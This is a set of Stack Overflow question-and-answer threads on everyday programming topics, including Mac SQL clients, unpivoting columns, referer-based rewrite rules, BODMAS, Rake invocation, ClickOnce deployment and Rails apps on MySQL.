Applicable to many of the other answers here -- the Type 1 JDBC-to-ODBC Bridge that most are referring to is the one Sun built in to and bundled with the JVM. JVM/JRE/JDK documentation has always advised against using this built-in except in experimental scenarios, or when no other option exists, because this component was built as a proof-of-concept, and was never intended for production use.
My employer makes an enterprise-grade JDBC-to-ODBC Bridge, available as either a Single-Tier (installs entirely on the client application host) or a Multi-Tier (splits components over the client application host and the ODBC data source host, enabling JDBC client applications in any JVM to use ODBC data sources on Mac, Windows, Linux, etc.). This solution isn't free.
All of the above can be used with the ODBC Drivers for Sybase & Microsoft SQL Server (or other databases) we also produce ...
A: I thought Sequel Pro for MySQL looked pretty interesting. It's hard to find one tool that works with all those databases (especially SQL Server 2005 . . . most people use SQL Server Management Studio and that's Windows only of course).
A: DbVisualizer supports many different databases. There is a free edition that I have used previously. Download from here
A: Squirrel SQL is a Java based SQL client, that I've had good experience with on Windows and Linux. Since it's Java, it should do the trick.
It's open source. You can run multiple sessions with multiple databases concurrently.
A: I vote for RazorSQL also. It's very powerful in many respects and practically supports most databases out there. I mostly use it for SQL Server, MySQL and PostgreSQL.
A: I have had good success over the last two years or so using Navicat for MySQL.
The UI could use a little updating, but all of the tools and options they provide make the cost justifiable for me.
A: Let's work together on a canonical answer.
Native Apps
*
*SQLPro for MSSQL
*Navicat
*Valentina Studio
*TablePlus
Java-Based
*
*Oracle SQL Developer (free)
*SQuirrel SQL (free, open source)
*Razor SQL
*DB Visualizer
*DBeaver (free, open source)
*SQL Workbench/J (free, open source)
*JetBrains DataGrip
*Metabase (free, open source)
*Netbeans (free, open source, full development environment)
Electron-Based
*
*Visual Studio Code with mssql extension
*Azure Data Studio
*SQLectron
(TODO: Add others mentioned below)
A: This will be the second question in a row I've answered with this, so I think it's worth pointing out that I have no affiliation with this product, but I use it and love it and think it's the right answer to this question too: DbVisualizer.
A: I use AquaFold at work on Windows, but it's based on Java and supports Mac OS X.
A: I use the Navicat clients for MySQL and PostgreSQL and am happy with them. "good" is obviously subjective... how do you judge your DB clients?
A: I like SQLGrinder.
It's built using Cocoa, so it looks a lot better and feels more like an Mac OS X application than all the Java-based application mentioned here.
It uses JDBC drivers to connect to Microsoft SQL Server 2005, FrontBase, MySQL, OpenBase, Oracle, PostgreSQL, and Sybase.
Free trial or $59.
A: I've used (DB Solo) and I like it a lot. It's only $99 and comparable to many more expensive tools. It supports Oracle, SQL Server, Sybase, MySQL, PostgreSQL and others.
A: I've been using Oracle SQL Developer since the Microsoft software for SQL Server is not currently available on Mac OS X. It works wonders. I would also recommend RazorSQL or SQLGrinder.
A: When this question was asked, Microsoft's Remote Desktop for OS X had been unsupported for years. It wasn't a Universal Binary, and I found it to be somewhat buggy (I recall that the application will just quit after a failed connection instead of allowing you to alter the connection info and try again).
At the time I recommended the Open Source CoRD, a good RDP client for Mac.
Since then Microsoft Remote Desktop Client for Mac 2 was released.
A: Not sure about open-source, but I've heard good things about http://www.advenio.com/sqlgrinder/ (not tried it, I prefer to write Python scripts to try things out rather than use GUIs;-).
A: The Java-based Oracle SQL Developer has a plugin module that supports SQL Server. I use it regularly on my Mac. It's free, too.
Here's how to install the SQL Server plugin:
*
*Run SQL Developer
*go to this menu item: Oracle SQL Developer/Preferences/Database/Third-party JDBC Drivers
*Click help.
*It will have pointers to the JAR files for MySQL, SQL Server, etc.
*The SQL Server JAR file is available at http://sourceforge.net/projects/jtds/files/
A: This doesn't specifically answer your question, because I'm not sure in any clients exist in Mac OS X, but I generally just Remote Desktop into the server and work through that. Another option is VMware Fusion (which is much better than Parallels in my opinion) + Windows XP + SQL Server Management Studio.
A: I've used Eclipse with the Quantum-DB plugins for that purpose since I was already using Eclipse anyway.
A: I use Eclipse's Database development plugins - like all Java based SQL editors, it works cross platform with any type 4 (ie pure Java) JDBC driver. It's ok for basic stuff (the main failing is it struggles to give transaction control -- auto-commit=true is always set it seems).
Microsoft have a decent JDBC type 4 driver: http://www.microsoft.com/downloads/details.aspx?FamilyId=6D483869-816A-44CB-9787-A866235EFC7C&displaylang=en this can be used with all Java clients / programs on Win/Mac/Lin/etc.
Those people struggling with Java/JDBC on a Mac are presumably trying to use native drivers instead of JDBC ones -- I haven't used (or practically heard of) the ODBC driver bridge in almost 10 years.
A: It may not be the best solution if you don't already have it, but FileMaker 11 with the Actual SQL Server ODBC driver (http://www.actualtech.com/product_sqlserver.php) worked nicely for a client of mine today. The ODBC driver is only $29, but FileMaker is $299, which is why you might only consider it if you already have it.
A: Try CoRD and modify what you want directly from the server.
It's open source.
http://cord.sourceforge.net/
A: Ed: phpMyAdmin is for MySQL, but the asker needs something for Microsoft SQL Server.
Most solutions that I found involve using an ODBC Driver and then whatever client application you use. For example, Gorilla SQL claims to be able to do that, even though the project seems abandoned.
Most good solutions are either using Remote Desktop or VMware/Parallels.
A: Since there currently isn't a MS SQL client for Mac OS X, I would, as Modesty has suggested, use Remote Desktop for the Mac.
A: For MySQL, there is Querious and Sequel Pro. The former costs US$25, and the latter is free. You can find a comparison of them here, and a list of some other Mac OS X MySQL clients here.
Steve
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3452",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "484"
} |
Q: How do I Transform Sql Columns into Rows? I have a very simple problem which requires a very quick and simple solution in SQL Server 2005.
I have a table with x Columns. I want to be able to select one row from the table and then transform the columns into rows.
TableA
Column1, Column2, Column3
SQL Statement to ruturn
ResultA
Value of Column1
Value of Column2
Value of Column3
@Kevin: I've had a google search on the topic but alot of the example where overly complex for my example, are you able to help further?
@Mario: The solution I am creating has 10 columns which stores the values 0 to 6 and I must work out how many columns have the value 3 or more. So I thought about creating a query to turn that into rows and then using the generated table in a subquery to say count the number of rows with Column >= 3
A: You should take a look at the UNPIVOT clause.
Update1: GateKiller, strangely enough I read an article (about something unrelated) about it this morning and I'm trying to jog my memory where I saw it again, had some decent looking examples too. It'll come back to me I'm sure.
Update2: Found it: http://weblogs.sqlteam.com/jeffs/archive/2008/04/23/unpivot.aspx
A: I had to do this for a project before. One of the major difficulties I had was explaining what I was trying to do to other people. I spent a ton of time trying to do this in SQL, but I found the pivot function woefully inadequate. I do not remember the exact reason why it was, but it is too simplistic for most applications, and it isn't full implemented in MS SQL 2000. I wound up writing a pivot function in .NET. I'll post it here in hopes it helps someone, someday.
''' <summary>
''' Pivots a data table from rows to columns
''' </summary>
''' <param name="dtOriginal">The data table to be transformed</param>
''' <param name="strKeyColumn">The name of the column that identifies each row</param>
''' <param name="strNameColumn">The name of the column with the values to be transformed from rows to columns</param>
''' <param name="strValueColumn">The name of the column with the values to pivot into the new columns</param>
''' <returns>The transformed data table</returns>
''' <remarks></remarks>
Public Shared Function PivotTable(ByVal dtOriginal As DataTable, ByVal strKeyColumn As String, ByVal strNameColumn As String, ByVal strValueColumn As String) As DataTable
Dim dtReturn As DataTable
Dim drReturn As DataRow
Dim strLastKey As String = String.Empty
Dim blnFirstRow As Boolean = True
' copy the original data table and remove the name and value columns
dtReturn = dtOriginal.Clone
dtReturn.Columns.Remove(strNameColumn)
dtReturn.Columns.Remove(strValueColumn)
' create a new row for the new data table
drReturn = dtReturn.NewRow
' Fill the new data table with data from the original table
For Each drOriginal As DataRow In dtOriginal.Rows
' Determine if a new row needs to be started
If drOriginal(strKeyColumn).ToString <> strLastKey Then
' If this is not the first row, the previous row needs to be added to the new data table
If Not blnFirstRow Then
dtReturn.Rows.Add(drReturn)
End If
blnFirstRow = False
drReturn = dtReturn.NewRow
' Add all non-pivot column values to the new row
For Each dcOriginal As DataColumn In dtOriginal.Columns
If dcOriginal.ColumnName <> strNameColumn AndAlso dcOriginal.ColumnName <> strValueColumn Then
drReturn(dcOriginal.ColumnName.ToLower) = drOriginal(dcOriginal.ColumnName.ToLower)
End If
Next
strLastKey = drOriginal(strKeyColumn).ToString
End If
' Add new columns if needed and then assign the pivot values to the proper column
If Not dtReturn.Columns.Contains(drOriginal(strNameColumn).ToString) Then
dtReturn.Columns.Add(drOriginal(strNameColumn).ToString, drOriginal(strValueColumn).GetType)
End If
drReturn(drOriginal(strNameColumn).ToString) = drOriginal(strValueColumn)
Next
' Add the final row to the new data table
dtReturn.Rows.Add(drReturn)
' Return the transformed data table
Return dtReturn
End Function
A: UNION should be your friend:
SELECT Column1 FROM table WHERE idColumn = 1
UNION ALL
SELECT Column2 FROM table WHERE idColumn = 1
UNION ALL
SELECT Column3 FROM table WHERE idColumn = 1
but it can also be your foe on large result sets.
A: If you have a fixed set of columns and you know what they are, you can basically do a series of subselects
(SELECT Column1 AS ResultA FROM TableA) as R1
and join the subselects. All this in a single query.
A: I'm not sure of the SQL Server syntax for this but in MySQL I would do
SELECT IDColumn, ( IF( Column1 >= 3, 1, 0 ) + IF( Column2 >= 3, 1, 0 ) + IF( Column3 >= 3, 1, 0 ) + ... [snip ] )
AS NumberOfColumnsGreaterThanThree
FROM TableA;
EDIT: A very (very) brief Google search tells me that the CASE statement does what I am doing with the IF statement in MySQL. You may or may not get use out of the Google result I found
FURTHER EDIT: I should also point out that this isn't an answer to your question but an alternative solution to your actual problem.
A: SELECT IDColumn,
NumberOfColumnsGreaterThanThree = (CASE WHEN Column1 >= 3 THEN 1 ELSE 0 END) +
(CASE WHEN Column2 >= 3 THEN 1 ELSE 0 END) +
(Case WHEN Column3 >= 3 THEN 1 ELSE 0 END)
FROM TableA;
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3470",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "17"
} |
Q: Block user access to internals of a site using HTTP_REFERER I have control over the HttpServer but not over the ApplicationServer or the Java Applications sitting there but I need to block direct access to certain pages on those applications. Precisely, I don't want users automating access to forms issuing direct GET/POST HTTP requests to the appropriate servlet.
So, I decided to block users based on the value of HTTP_REFERER. After all, if the user is navigating inside the site, it will have an appropriate HTTP_REFERER. Well, that was what I thought.
I implemented a rewrite rule in the .htaccess file that says:
RewriteEngine on
# Options +FollowSymlinks
RewriteCond %{HTTP_REFERER} !^http://mywebaddress(.cl)?/.* [NC]
RewriteRule (servlet1|servlet2)/.+\?.+ - [F]
I expected to forbid access to users that didn't navigate the site but issue direct GET requests to the "servlet1" or "servlet2" servlets using querystrings. But my expectations ended abruptly because the regular expression (servlet1|servlet2)/.+\?.+ didn't worked at all.
I was really disappointed when I changed that expression to (servlet1|servlet2)/.+ and it worked so well that my users were blocked no matter if they navigated the site or not.
So, my question is: How do I can accomplish this thing of not allowing "robots" with direct access to certain pages if I have no access/privileges/time to modify the application?
A: I'm not sure if I can solve this in one go, but we can go back and forth as necessary.
First, I want to repeat what I think you are saying and make sure I'm clear. You want to disallow requests to servlet1 and servlet2 is the request doesn't have the proper referer and it does have a query string? I'm not sure I understand (servlet1|servlet2)/.+\?.+ because it looks like you are requiring a file under servlet1 and 2. I think maybe you are combining PATH_INFO (before the "?") with a GET query string (after the "?"). It appears that the PATH_INFO part will work but the GET query test will not. I made a quick test on my server using script1.cgi and script2.cgi and the following rules worked to accomplish what you are asking for. They are obviously edited a little to match my environment:
RewriteCond %{HTTP_REFERER} !^http://(www.)?example.(com|org) [NC]
RewriteCond %{QUERY_STRING} ^.+$
RewriteRule ^(script1|script2)\.cgi - [F]
The above caught all wrong-referer requests to script1.cgi and script2.cgi that tried to submit data using a query string. However, you can also submit data using a path_info and by posting data. I used this form to protect against any of the three methods being used with incorrect referer:
RewriteCond %{HTTP_REFERER} !^http://(www.)?example.(com|org) [NC]
RewriteCond %{QUERY_STRING} ^.+$ [OR]
RewriteCond %{REQUEST_METHOD} ^POST$ [OR]
RewriteCond %{PATH_INFO} ^.+$
RewriteRule ^(script1|script2)\.cgi - [F]
Based on the example you were trying to get working, I think this is what you want:
RewriteCond %{HTTP_REFERER} !^http://mywebaddress(.cl)?/.* [NC]
RewriteCond %{QUERY_STRING} ^.+$ [OR]
RewriteCond %{REQUEST_METHOD} ^POST$ [OR]
RewriteCond %{PATH_INFO} ^.+$
RewriteRule (servlet1|servlet2)\b - [F]
Hopefully this at least gets you closer to your goal. Please let us know how it works, I'm interested in your problem.
(BTW, I agree that referer blocking is poor security, but I also understand that relaity forces imperfect and partial solutions sometimes, which you seem to already acknowledge.)
A: I don't have a solution, but I'm betting that relying on the referrer will never work because user-agents are free to not send it at all or spoof it to something that will let them in.
A: You can't tell apart users and malicious scripts by their http request. But you can analyze which users are requesting too many pages in too short a time, and block their ip-addresses.
A: Javascript is another helpful tool to prevent (or at least delay) screen scraping. Most automated scraping tools don't have a Javascript interpreter, so you can do things like setting hidden fields, etc.
Edit: Something along the lines of this Phil Haack article.
A: Using a referrer is very unreliable as a method of verification. As other people have mentioned, it is easily spoofed. Your best solution is to modify the application (if you can)
You could use a CAPTCHA, or set some sort of cookie or session cookie that keeps track of what page the user last visited (a session would be harder to spoof) and keep track of page view history, and only allow users who have browsed the pages required to get to the page you want to block.
This obviously requires you to have access to the application in question, however it is the most foolproof way (not completely, but "good enough" in my opinion.)
A: I'm guessing you're trying to prevent screen scraping?
In my honest opinion it's a tough one to solve and trying to fix by checking the value of HTTP_REFERER is just a sticking plaster. Anyone going to the bother of automating submissions is going to be savvy enough to send the correct referer from their 'automaton'.
You could try rate limiting but without actually modifying the app to force some kind of is-this-a-human validation (a CAPTCHA) at some point then you're going to find this hard to prevent.
A: If you're trying to prevent search engine bots from accessing certain pages, make sure you're using a properly formatted robots.txt file.
Using HTTP_REFERER is unreliable because it is easily faked.
Another option is to check the user agent string for known bots (this may require code modification).
A: To make the things a little more clear:
*
*Yes, I know that using HTTP_REFERER is completely unreliable and somewhat childish but I'm pretty sure that the people that learned (from me maybe?) to make automations with Excel VBA will not know how to subvert a HTTP_REFERER within the time span to have the final solution.
*I don't have access/privilege to modify the application code. Politics. Do you believe that? So, I must to wait until the rights holder make the changes I requested.
*From previous experiences, I know that the requested changes will take two month to get in Production. No, tossing them Agile Methodologies Books in their heads didn't improve anything.
*This is an intranet app. So I don't have a lot of youngsters trying to undermine my prestige. But I'm young enough as to try to undermine the prestige of "a very fancy global consultancy services that comes from India" but where, curiously, there are not a single indian working there.
So far, the best answer comes from "Michel de Mare": block users based on their IPs. Well, that I did yesterday. Today I wanted to make something more generic because I have a lot of kangaroo users (jumping from an Ip address to another) because they use VPN or DHCP.
A: You might be able to use an anti-CSRF token to achieve what you're after.
This article explains it in more detail: Cross-Site Request Forgeries
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3486",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "5"
} |
Q: What does the term "BODMAS" mean? What is BODMAS and why is it useful in programming?
A: Another version of this (in middle school) was "Please Excuse My Dear Aunt Sally".
*
*Parentheses
*Exponents
*Multiplication
*Division
*Addition
*Subtraction
The mnemonic device was helpful in school, and still useful in programming today.
A: Order of operations in an expression, such as:
foo * (bar + baz^2 / foo)
*
*Brackets first
*Orders (ie Powers and Square Roots, etc.)
*Division and Multiplication (left-to-right)
*Addition and Subtraction (left-to-right)
source: http://www.mathsisfun.com/operation-order-bodmas.html
A: I don't have the power to edit @Michael Stum's answer, but it's not quite correct. He reduces
(i + 4) - (a + b)
to
(i + 4 - a + b)
They are not equivalent. The best reduction I can get for the whole expression is
((i + 4) - (a + b)) * MAGIC_NUMBER - ANOTHER_MAGIC_NUMBER;
or
(i + 4 - a - b) * MAGIC_NUMBER - ANOTHER_MAGIC_NUMBER;
A: When I learned this in grade school (in Canada) it was referred to as BEDMAS:
Brackets
Exponents
Division
Multiplication
Addition
Subtraction
Just for those from this part of the world...
A: http://www.easymaths.com/What_on_earth_is_Bodmas.htm:
What do you think the answer to 2 + 3 x 5 is?
Is it (2 + 3) x 5 = 5 x 5 = 25 ?
or 2 + (3 x 5) = 2 + 15 = 17 ?
BODMAS can come to the rescue and give us rules to follow so that we always get the right answer:
(B)rackets (O)rder (D)ivision (M)ultiplication (A)ddition (S)ubtraction
According to BODMAS, multiplication should always be done before addition, therefore 17 is actually the correct answer according to BODMAS and will also be the answer which your calculator will give if you type in 2 + 3 x 5 .
Why it is useful in programming? No idea, but i assume it's because you can get rid of some brackets? I am a quite defensive programmer, so my lines can look like this:
result = (((i + 4) - (a + b)) * MAGIC_NUMBER) - ANOTHER_MAGIC_NUMBER;
with BODMAS you can make this a bit clearer:
result = (i + 4 - (a + b)) * MAGIC_NUMBER - ANOTHER_MAGIC_NUMBER;
I think i'd still use the first variant - more brackets, but that way i do not have to learn yet another rule and i run into less risk of forgetting it and causing those weird hard to debug errors?
Just guessing at that part though.
Mike Stone EDIT: Fixed math as Gaius points out
A: I'm not really sure how applicable to programming the old BODMAS mnemonic is anyways. There is no guarantee on order of operations between languages, and while many keep the standard operations in that order, not all do. And then there are some languages where order of operations isn't really all that meaningful (Lisp dialects, for example). In a way, you're probably better off for programming if you forget the standard order and either use parentheses for everything(eg (a*b) + c) or specifically learn the order for each language you work in.
A: I read somewhere that especially in C/C++ splitting your expressions into small statements was better for optimisation; so instead of writing hugely complex expressions in one line, you cache the parts into variables and do each one in steps, then build them up as you go along.
The optimisation routines will use registers in places where you had variables so it shouldn't impact space but it can help the compiler a little.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3510",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "16"
} |
Q: Searching directories for tons of files? I'm using MSVE, and I have my own tiles I'm displaying in layers on top. Problem is, there's a ton of them, and they're on a network server. In certain directories, there are something on the order of 30,000+ files. Initially I called Directory.GetFiles, but once I started testing in a pseudo-real environment, it timed out.
What's the best way to programatically list, and iterate through, this many files?
Edit: My coworker suggested using the MS indexing service. Has anyone tried this approach, and (how) has it worked?
A: I've worked on a SAN system in the past with telephony audio recordings which had issues with numbers of files in a single folder - that system became unusable somewhere near 5,000 (on Windows 2000 Advanced Server with an application in C#.Net 1.1)- the only sensible solution that we came up with was to change the folder structure so that there were a more reasonable number of files. Interestingly Explorer would also time out!
The convention we came up with was a structure that broke the structure up in years, months and days - but that will depend upon your system and whether you can control the directory structure...
A: Definitely split them up. That said, stay as far away from the Indexing Service as you can.
A: None. .NET relies on underlying Windows API calls that really, really hate that amount of files themselves.
As Ronnie says: split them up.
A: You could use DOS?
DIR /s/b > Files.txt
A: You could also look at either indexing the files yourself, or getting a third part app like google desktop or copernic to do it and then interface with their index. I know copernic has an API that you can use to search for any file in their index and it also supports mapping network drives.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3512",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "15"
} |
Q: How do I run Rake tasks within a Ruby script? I have a Rakefile with a Rake task that I would normally call from the command line:
rake blog:post Title
I'd like to write a Ruby script that calls that Rake task multiple times, but the only solution I see is shelling out using `` (backticks) or system.
What's the right way to do this?
A: from timocracy.com:
require 'rake'
def capture_stdout
s = StringIO.new
oldstdout = $stdout
$stdout = s
yield
s.string
ensure
$stdout = oldstdout
end
Rake.application.rake_require 'metric_fetcher', ['../../lib/tasks']
results = capture_stdout {Rake.application['metric_fetcher'].invoke}
A: In a script with Rails loaded (e.g. rails runner script.rb)
def rake(*tasks)
tasks.each do |task|
Rake.application[task].tap(&:invoke).tap(&:reenable)
end
end
rake('db:migrate', 'cache:clear', 'cache:warmup')
A: This works with Rake version 10.0.3:
require 'rake'
app = Rake.application
app.init
# do this as many times as needed
app.add_import 'some/other/file.rake'
# this loads the Rakefile and other imports
app.load_rakefile
app['sometask'].invoke
As knut said, use reenable if you want to invoke multiple times.
A: You can use invoke and reenable to execute the task a second time.
Your example call rake blog:post Title seems to have a parameter. This parameter can be used as a parameter in invoke:
Example:
require 'rake'
task 'mytask', :title do |tsk, args|
p "called #{tsk} (#{args[:title]})"
end
Rake.application['mytask'].invoke('one')
Rake.application['mytask'].reenable
Rake.application['mytask'].invoke('two')
Please replace mytask with blog:post and instead the task definition you can require your rakefile.
This solution will write the result to stdout - but you did not mention, that you want to suppress output.
Interesting experiment:
You can call the reenable also inside the task definition. This allows a task to reenable himself.
Example:
require 'rake'
task 'mytask', :title do |tsk, args|
p "called #{tsk} (#{args[:title]})"
tsk.reenable #<-- HERE
end
Rake.application['mytask'].invoke('one')
Rake.application['mytask'].invoke('two')
The result (tested with rake 10.4.2):
"called mytask (one)"
"called mytask (two)"
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3530",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "60"
} |
Q: What is the best way to deploy a VB.NET application? Generally when I use ClickOnce when I build a VB.NET program but it has a few downsides. I've never really used anything else, so I'm not sure
what my options are.
Downsides to ClickOnce:
*
*Consists of multiple files - Seems easier to distribute one file than manageing a bunch of file and the downloader to download those files.
*You have to build it again for CD installations (for when the end user dosn't have internet)
*Program does not end up in Program Files - It ends up hidden away in some application catch folder, making it much harder to shortcut to.
Pros to ClickOnce:
*
*It works. Magically. And it's built
into VisualStudio 2008 express.
*Makes it easy to upgrade the
application.
Does Windows Installer do these things as well? I know it dosen't have any of the ClickOnce cons, but It would be nice to know if it also has the ClickOnce pros.
Update:
I ended up using Wix 2 (Wix 3 was available but at the time I did the project, no one had a competent tutorial). It was nice because it supported the three things I (eventually) needed. An optional start-up-with-windows shortcut, a start-up-when-the-installer-is-done option, and three paragraphs of text that my boss thinks will keep uses from clicking the wrong option.
A: Have you seen WiX yet?
http://wix.sourceforge.net/
It builds windows installers using an XML file and has additional libraries to use if you want to fancify your installers and the like. I'll admit the learning curve for me was medium-high in getting things started, but afterwards I was able to build a second installer without any hassles.
It will handle updates and other items if you so desire, and you can apply folder permissions and the like to the installers. It also gives you greater control on where exactly you want to install files and is compatible with all the standardized Windows folder conventions, so you can specify "PROGRAM_DATA" or something to that effect and the installer knows to put it in C:\Documents and Settings\All Users\Application Data or C:\ProgramData depending on if you're running XP or Vista.
The rumor is that Office 2007 and Visual Studio 2008 used WiX to create their installer, but I haven't been able to verify that anywhere. I do believe is is developed by some Microsoft folks on the inside.
A: I agree with Joseph, my experience with ClickOnce is its great for the vast majority of projects especially in a corporate environment where it makes build, publish and deployment easy. Implementing the "forced upgrade" to ensure users have the latest version when running is so much easier in ClickOnce, and a main reason for my usage of it.
Issues with ClickOnce: In a corporate environment it has issues with proxy servers and the workarounds are less than ideal. I've had to deploy a few apps in those cases from UNC paths...but you can't do that all the time. Its "sandbox" is great, until you want to find the executable or create a desktop shortcut.
Have not deployed out of 2008 yet so not sure if those issues still exist.
A: Creating an installer project, with a dependency on your EXE (which in turn depends on whatever it needs) is a fairly straightforward process - but you'll need at least VS Standard Edition for that.
Inside the installer project, you can create custom tasks and dialog steps that allow you to do anything you code up.
What's missing is the auto-upgrade and version-checking magic you get with ClickOnce. You can still build it in, it's just not automatic.
A: I don't believe there is any easy way to make a Windows Installer project have the ease or upgradability of ClickOnce. I use ClickOnce for all the internal .NET apps I develop (with the exception of Console Apps). I find that in an enterprise environment, the ease of deployment outweighs the lack of flexibility.
A: ClickOnce can be problematic if you have 3rd party components that need to be installed along with your product. You can skirt this to some extent by creating installers for the components however with ClickOnce deployment you have to create the logic to update said component installers.
I've in a previous life used Wise For Windows Installer to create installation packages. While creating upgrades with it were not automatic like ClickOnce is, they were more precise and less headache filled when it came to other components that needed to be registered/added.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3544",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "8"
} |
Q: SQL query for a database scheme In SQL Server how do you query a database to bring back all the tables that have a field of a specific name?
A: The following query will bring back a unique list of tables where Column_Name is equal to the column you are looking for:
SELECT Table_Name
FROM INFORMATION_SCHEMA.COLUMNS
WHERE Column_Name = 'Desired_Column_Name'
GROUP BY Table_Name
A: SELECT Table_Name
FROM Information_Schema.Columns
WHERE Column_Name = 'YourFieldName'
A: I'm old-school:
SELECT DISTINCT object_name(id)
FROM syscolumns
WHERE name = 'FIELDNAME'
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3567",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "7"
} |
Q: Create a new Ruby on Rails application using MySQL instead of SQLite I want to create my Rails application with MySQL, because I like it so much. How can I do that in the latest version of Rails instead of the default SQLite?
A: $ rails --help
is always your best friend
usage:
$ rails new APP_PATH[options]
also note that options should be given after the application name
rails and mysql
$ rails new project_name -d mysql
rails and postgresql
$ rails new project_name -d postgresql
A: You should use the switch -D instead of -d because it will generate two apps and mysql with no documentation folders.
rails -D mysql project_name (less than version 3)
rails new project_name -D mysql (version 3 and up)
Alternatively you just use the --database option.
A: For Rails 3 you can use this command to create a new project using mysql:
$ rails new projectname -d mysql
A: If you are creating a new rails application you can set the database using the -d switch like this:
rails -d mysql myapp
Its always easy to switch your database later though, and using sqlite really is easier if you are developing on a Mac.
A: In Rails 3, you could do
$rails new projectname --database=mysql
A: Just go to rails console and type:
rails new YOURAPPNAME -d mysql
A: On new project, easy peasy:
rails new your_new_project_name -d mysql
On existing project, definitely trickier. This has given me a number of issues on existing rails projects. This kind of works with me:
# On Gemfile:
gem 'mysql2', '>= 0.3.18', '< 0.5' # copied from a new project for rails 5.1 :)
gem 'activerecord-mysql-adapter' # needed for mysql..
# On Dockerfile or on CLI:
sudo apt-get install -y mysql-client libmysqlclient-dev
A: Normally, you would create a new Rails app using
rails ProjectName
To use MySQL, use
rails new ProjectName -d mysql
A: Go to the terminal and write:
rails new <project_name> -d mysql
A: If you have not created your app yet, just go to cmd(for windows) or terminal(for linux/unix) and type the following command to create a rails application with mysql database:
$rails new <your_app_name> -d mysql
It works for anything above rails version 3. If you have already created your app, then you can do one of the 2 following things:
*
*Create a another_name app with mysql database, go to cd another_name/config/ and copy the database.yml file from this new app. Paste it into the database.yml of your_app_name app. But ensure to change the database names and set username/password of your database accordingly in the database.yml file after doing so.
OR
*
*Go to cd your_app_name/config/ and open database.yml. Rename as following:
development:
adapter: mysql2
database: db_name_name
username: root
password:
host: localhost
socket: /tmp/mysql.sock
Moreover, remove gem 'sqlite3' from your Gemfile and add the gem 'mysql2'
A: First make sure that mysql gem is installed, if not? than type following command in your console
gem install mysql2
Than create new rails app and set mysql database as default database by typing following command in your console
rails new app-name -d mysql
A: If you already have a rails project, change the adapter in the config/database.yml file to mysql and make sure you specify a valid username and password, and optionally, a socket:
development:
adapter: mysql2
database: db_name_dev
username: koploper
password:
host: localhost
socket: /tmp/mysql.sock
Next, make sure you edit your Gemfile to include the mysql2 or activerecord-jdbcmysql-adapter (if using jruby).
A: If you are using rails 3 or greater version
rails new your_project_name -d mysql
if you have earlier version
rails new -d mysql your_project_name
So before you create your project you need to find the rails version. that you can find by
rails -v
A: rails -d mysql ProjectName
A: rails new <project_name> -d mysql
OR
rails new projectname
Changes in config/database.yml
development:
adapter: mysql2
database: db_name_name
username: root
password:
host: localhost
socket: /tmp/mysql.sock
A: Create application with -d option
rails new AppName -d mysql
A: Use following command to create new app for API with mysql database
rails new <appname> --api -d mysql
adapter: mysql2
encoding: utf8
pool: 5
username: root
password:
socket: /var/run/mysqld/mysqld.sock
A: database.yml
# MySQL. Versions 5.1.10 and up are supported.
#
# Install the MySQL driver
# gem install mysql2
#
# Ensure the MySQL gem is defined in your Gemfile
# gem 'mysql2'
#
# And be sure to use new-style password hashing:
# https://dev.mysql.com/doc/refman/5.7/en/password-hashing.html
#
default: &default
adapter: mysql2
encoding: utf8
pool: <%= ENV.fetch("RAILS_MAX_THREADS") { 5 } %>
host: localhost
database: database_name
username: username
password: secret
development:
<<: *default
# Warning: The database defined as "test" will be erased and
# re-generated from your development database when you run "rake".
# Do not set this db to the same as development or production.
test:
<<: *default
# As with config/secrets.yml, you never want to store sensitive information,
# like your database password, in your source code. If your source code is
# ever seen by anyone, they now have access to your database.
#
# Instead, provide the password as a unix environment variable when you boot
# the app. Read http://guides.rubyonrails.org/configuring.html#configuring-a-database
# for a full rundown on how to provide these environment variables in a
# production deployment.
#
# On Heroku and other platform providers, you may have a full connection URL
# available as an environment variable. For example:
#
# DATABASE_URL="mysql2://myuser:mypass@localhost/somedatabase"
#
# You can use this database configuration with:
#
# production:
# url: <%= ENV['DATABASE_URL'] %>
#
production:
<<: *default
Gemfile:
# Use mysql as the database for Active Record
gem 'mysql2', '>= 0.4.4', '< 0.6.0'
A: you first should make sure that MySQL driver is on your system if not run this on your terminal if you are using Ubuntu or any Debian distro
sudo apt-get install mysql-client libmysqlclient-dev
and add this to your Gemfile
gem 'mysql2', '~> 0.3.16'
then run in your root directory of the project
bundle install
after that you can add the mysql config to config/database.yml as the previous answers
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3585",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "134"
} |
Q: Backup SQL Schema Only? I need to create a backup of a SQL Server 2005 Database that's only the structure...no records, just the schema. Is there any way to do this?
EDIT: I'm trying to create a backup file to use with old processes, so a script wouldn't work for my purposes, sorry
A: Use a 3 step process:
*
*Generate a script from the working database
*Create a new database from that script
*Create a backup of the new database
A: Why not just use SQL Management Studio to create a complete script of your database and the objects?
A: I make heavy use of this tool:
SQLBalance for MySQL
Unfortunately; its windows only... but works like a charm to move databases around, data or no data, merge or compare.
A: Toad for SQL Server does this nicely, if you're considering a commercial product.
A: As of SQL Server 2012 (patched), you can make a schema only clone of your database using DBCC CLONEDATABASE. Then simply backup the clone.
dbcc clonedatabase(Demo, Demo_Clone) with verify_clonedb;
alter database [Demo_Clone] set read_write;
backup database [Demo_Clone] to disk = N'C:\temp\Demo_SchemaOnly_20220821.bak';
drop database [Demo_Clone];
Read more here: Schema Only Database Backup
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3589",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "22"
} |
